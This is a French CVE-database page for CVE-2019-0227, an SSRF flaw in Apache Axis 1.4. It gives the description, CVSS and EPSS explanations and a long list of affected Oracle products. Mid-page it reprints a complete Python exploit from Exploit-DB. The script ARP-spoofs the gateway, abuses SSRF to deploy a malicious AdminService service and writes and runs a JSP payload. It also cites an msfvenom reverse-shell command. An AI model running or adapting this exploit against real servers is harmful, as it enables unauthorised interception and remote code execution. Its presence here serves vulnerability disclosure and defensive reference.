CVE-2019-0227 : Détail

CVE-2019-0227

7.5
/
Haute
Server-Side Request Forgery - SSRF
A10-Server-Side Req. Forgery (SSRF)
79.28%V3
Adjacent
2019-05-01
18h03 +00:00
2024-06-21
17h06 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-918 Server-Side Request Forgery (SSRF)
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V3.1 7.5 HIGH CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Adjacent

The vulnerable component is bound to the network stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared physical (e.g., Bluetooth or IEEE 802.11) or logical (e.g., local IP subnet) network, or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN to an administrative network zone).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

High

successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

nvd@nist.gov
V2 5.4 AV:A/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 46682

Date de publication : 2019-04-08 22h00 +00:00
Auteur : David Yesland
EDB Vérifié : No

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# # Apache Axis 1.4 Remote Code Execution CVE-2019-0227 # #https://rhinosecuritylabs.com/Application-Security/CVE-2019-0227-Expired-Domain-to-RCE-in-Apache-Axis # # Author: David Yesland @daveysec, Rhino Security Labs # # This exploits Apache Axis < 1.4 to upload and execute a JSP payload using MITM # # by forcing an http request using the default StockQuoteService.jws service. # # You need to be on the same network as the Axis server to make this work. # # A lot of this exploit is based on the research from: # # https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce # #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# import SimpleHTTPServer import SocketServer import subprocess from time import sleep import thread import requests from urllib import quote_plus import sys #Usage: python CVE-2019-0227.py shell.jsp #You need to change these variable to match your configuration myip = "192.168.0.117" #IP of your machine target = "192.168.0.102" #IP of target gateway = "192.168.0.1" #default gateway targetport = "8080" #Port of target running axis (probably 8080) pathtoaxis = "http://192.168.0.102:8080/axis" #This can be custom depending on the Axis install, but this is default spoofinterface = "eth0" #Interface for arpspoofing jspwritepath = "webapps\\axis\\exploit.jsp" #relative path on the target to write the JSP payload This is the default on a Tomcat install #msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp payloadfile = open(sys.argv[1],'r').read() #Some file containing a JSP payload #craft URL to deploy a service as described here https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce deployurl = 'http://localhost:'+targetport+'/axis/services/AdminService?method=%21--%3E%3Cns1%3Adeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22exploitservice%22+provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler+type%3D%22RandomLog%22%2F%3E%3C%2FrequestFlow%3E%3Cns1%3Aparameter+name%3D%22className%22+value%3D%22java.util.Random%22%2F%3E%3Cns1%3Aparameter+name%3D%22allowedMethods%22+value%3D%22%2A%22%2F%3E%3C%2Fns1%3Aservice%3E%3Chandler+name%3D%22RandomLog%22+type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22+%3E%3Cparameter+name%3D%22LogHandler.fileName%22+value%3D%22'+quote_plus(jspwritepath)+'%22+%2F%3E%3Cparameter+name%3D%22LogHandler.writeToConsole%22+value%3D%22false%22+%2F%3E%3C%2Fhandler%3E%3C%2Fns1%3Adeployment' #craft URL to undeploy a service as described here https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce undeployurl = 'http://localhost:'+targetport+'/axis/services/AdminService?method=%21--%3E%3Cns1%3Aundeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22exploitservice%22%2F%3E%3C%2Fns1%3Aundeployment' def CreateJsp(pathtoaxis,jsppayload): url = pathtoaxis+"/services/exploitservice" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "SOAPAction": "something", "Content-Type": "text/xml;charset=UTF-8"} data="<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n xmlns:api=\"http://127.0.0.1/Integrics/Enswitch/API\"\r\n xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\r\n xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Body>\r\n <api:main\r\n soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <api:in0><![CDATA[\r\n"+jsppayload+"\r\n]]>\r\n </api:in0>\r\n </api:main>\r\n </soapenv:Body>\r\n</soapenv:Envelope>" requests.post(url, headers=headers, data=data) def TriggerSSRF(pathtoaxis): url = pathtoaxis+"/StockQuoteService.jws" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "SOAPAction": "", "Content-Type": "text/xml;charset=UTF-8"} data="<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:def=\"http://DefaultNamespace\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n <def:getQuote soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <symbol xsi:type=\"xsd:string\">dwas</symbol>\r\n </def:getQuote>\r\n </soapenv:Body>\r\n</soapenv:Envelope>" requests.post(url, headers=headers, data=data) def StartMitm(interface,target,gateway): subprocess.Popen("echo 1 > /proc/sys/net/ipv4/ip_forward",shell=True)#Enable forwarding subprocess.Popen("arpspoof -i {} -t {} {}".format(interface,target,gateway),shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)#spoof target -> gateway subprocess.Popen("iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to {}".format(myip),shell=True)#use iptable to redirect back to our web server def KillMitm(target,myip): subprocess.Popen("pkill arpspoof",shell=True) subprocess.Popen("echo 0 > /proc/sys/net/ipv4/ip_forward",shell=True) subprocess.Popen("iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to {}".format(myip),shell=True) def SSRFRedirect(new_path): class myHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): self.send_response(301) self.send_header('Location', new_path) self.end_headers() PORT = 80 SocketServer.TCPServer.allow_reuse_address = True handler = SocketServer.TCPServer(("", PORT), myHandler) print "[+] Waiting to redirect" handler.handle_request() print "[+] Payload URL sent" def ExecuteJsp(pathtoaxis): subprocess.Popen("curl "+pathtoaxis+"/exploit.jsp",shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print "[+] Starting MITM" StartMitm(spoofinterface,target,gateway) sleep(2) print "[+] Starting web server for SSRF" thread.start_new_thread(SSRFRedirect,(deployurl,)) print "[+] Using StockQuoteService.jws to trigger SSRF" TriggerSSRF(pathtoaxis) print "[+] Waiting 3 seconds for incoming request" sleep(3) print "[+] Writing JSP payload" CreateJsp(pathtoaxis,payloadfile) print "[+] Cleaning up exploit service" thread.start_new_thread(SSRFRedirect,(undeployurl,)) TriggerSSRF(pathtoaxis) print "[+] Cleaning up man in the middle" KillMitm(target,myip) print "[+] Waiting 2 seconds for JSP write" sleep(2) ExecuteJsp(pathtoaxis) print "[+] Default URL to the jsp payload:" print pathtoaxis+"/exploit.jsp"

Products Mentioned

Configuraton 0

Apache>>Axis >> Version 1.4

Configuraton 0

Oracle>>Agile_engineering_data_management >> Version 6.2.1.0

Oracle>>Agile_product_lifecycle_management_framework >> Version 9.3.3

Oracle>>Application_testing_suite >> Version 13.2.0.1

Oracle>>Application_testing_suite >> Version 13.3.0.1

Oracle>>Big_data_discovery >> Version 1.6

Oracle>>Communications_asap_cartridges >> Version 7.2

Oracle>>Communications_asap_cartridges >> Version 7.3

Oracle>>Communications_design_studio >> Version 7.3.4.3.0

Oracle>>Communications_design_studio >> Version 7.3.5.5.0

Oracle>>Communications_design_studio >> Version 7.4.0.4.0

Oracle>>Communications_design_studio >> Version 7.4.1.1.0

Oracle>>Communications_element_manager >> Version 8.0.0

Oracle>>Communications_element_manager >> Version 8.1.0

Oracle>>Communications_element_manager >> Version 8.1.1

Oracle>>Communications_element_manager >> Version 8.2.0

Oracle>>Communications_network_integrity >> Version 7.3.5

Oracle>>Communications_network_integrity >> Version 7.3.6

Oracle>>Communications_order_and_service_management >> Version 7.3.0.0.0

  • Oracle>>Communications_order_and_service_management >> Version 7.3.0.0.0 (Open CPE detail)

Oracle>>Communications_order_and_service_management >> Version 7.4

Oracle>>Communications_session_report_manager >> Version 8.0.0

Oracle>>Communications_session_report_manager >> Version 8.1.0

Oracle>>Communications_session_report_manager >> Version 8.1.1

Oracle>>Communications_session_report_manager >> Version 8.2.0

Oracle>>Communications_session_route_manager >> Version 8.0.0

Oracle>>Communications_session_route_manager >> Version 8.1.0

Oracle>>Communications_session_route_manager >> Version 8.1.1

Oracle>>Communications_session_route_manager >> Version 8.2.0

Oracle>>Endeca_information_discovery_studio >> Version 3.2.0

Oracle>>Enterprise_manager_base_platform >> Version 12.1.0.5

Oracle>>Enterprise_manager_base_platform >> Version 13.3.0.0

Oracle>>Enterprise_manager_for_fusion_middleware >> Version 12.1.0.5

Oracle>>Financial_services_analytical_applications_infrastructure >> Version From (including) 7.3.3 To (including) 7.3.5

  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.3 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.3.0.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.3.0.1 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.3.0.2 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.5 (Open CPE detail)

Oracle>>Financial_services_analytical_applications_infrastructure >> Version From (including) 8.0.0 To (including) 8.0.8

  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.0.0.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.0.1.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.0.2.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.0.3.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.1.0.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.1.1.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.1.2.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.2 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.2.0.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.2.1.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.2.2.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.3 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.3.0.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.3.1.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.3.2.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.3.3.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.0.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.1.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.2.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.3.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.4.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.5.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.0.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.0.1 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.1.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.2.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.3.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.4.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.0.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.0.1 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.1.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.2.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.3.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.4.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.7 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.7.0.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.7.1.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.7.2.0 (Open CPE detail)
  • Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.8 (Open CPE detail)

Oracle>>Financial_services_compliance_regulatory_reporting >> Version From (including) 8.0.6 To (including) 8.0.8

    Oracle>>Financial_services_funds_transfer_pricing >> Version From (including) 8.0.2 To (including) 8.0.7

    Oracle>>Flexcube_core_banking >> Version 11.7.0

    Oracle>>Flexcube_core_banking >> Version 11.8.0

    Oracle>>Flexcube_core_banking >> Version 11.9.0

    Oracle>>Flexcube_core_banking >> Version 11.10.0

    Oracle>>Flexcube_private_banking >> Version 12.0.0

    Oracle>>Flexcube_private_banking >> Version 12.1.0

    Oracle>>Hospitality_guest_access >> Version 4.2.0

    Oracle>>Hospitality_guest_access >> Version 4.2.1

    Oracle>>Instantis_enterprisetrack >> Version 17.1

    Oracle>>Instantis_enterprisetrack >> Version 17.2

    Oracle>>Instantis_enterprisetrack >> Version 17.3

    Oracle>>Internet_directory >> Version 12.2.1.3.0

    Oracle>>Internet_directory >> Version 12.2.1.4.0

      Oracle>>Knowledge >> Version From (including) 8.6.0 To (including) 8.6.3

      Oracle>>Peoplesoft_enterprise_human_capital_management_human_resources >> Version 7.3.5

      • Oracle>>Peoplesoft_enterprise_human_capital_management_human_resources >> Version 7.3.5 (Open CPE detail)

      Oracle>>Peoplesoft_enterprise_human_capital_management_human_resources >> Version 7.3.6

      • Oracle>>Peoplesoft_enterprise_human_capital_management_human_resources >> Version 7.3.6 (Open CPE detail)

      Oracle>>Peoplesoft_enterprise_human_capital_management_human_resources >> Version 9.2

      • Oracle>>Peoplesoft_enterprise_human_capital_management_human_resources >> Version 9.2 (Open CPE detail)

      Oracle>>Peoplesoft_enterprise_peopletools >> Version 8.56

      Oracle>>Peoplesoft_enterprise_peopletools >> Version 8.57

      Oracle>>Peoplesoft_enterprise_peopletools >> Version 8.58

      Oracle>>Policy_automation_connector_for_siebel >> Version 10.4.6

      Oracle>>Primavera_gateway >> Version 16.2.11

      Oracle>>Primavera_gateway >> Version 17.12.6

      Oracle>>Primavera_unifier >> Version From (including) 17.7 To (including) 17.12

      Oracle>>Primavera_unifier >> Version 16.1

      Oracle>>Primavera_unifier >> Version 16.2

      Oracle>>Primavera_unifier >> Version 18.8

      Oracle>>Primavera_unifier >> Version 19.12

      Oracle>>Rapid_planning >> Version 12.1

      Oracle>>Rapid_planning >> Version 12.2

      Oracle>>Real-time_decision_server >> Version 3.2.1.0

      Oracle>>Retail_order_broker >> Version 15.0

      Oracle>>Retail_order_broker >> Version 16.0

      Oracle>>Retail_order_broker >> Version 18.0

      Oracle>>Retail_xstore_point_of_service >> Version 7.1

      Oracle>>Secure_global_desktop >> Version 5.4

      Oracle>>Secure_global_desktop >> Version 5.5

      Oracle>>Siebel_ui_framework >> Version To (including) 21.0

      Oracle>>Tuxedo >> Version 12.1.1.0.0

      Oracle>>Tuxedo >> Version 12.1.3

      Oracle>>Webcenter_portal >> Version 12.2.1.3.0

      Références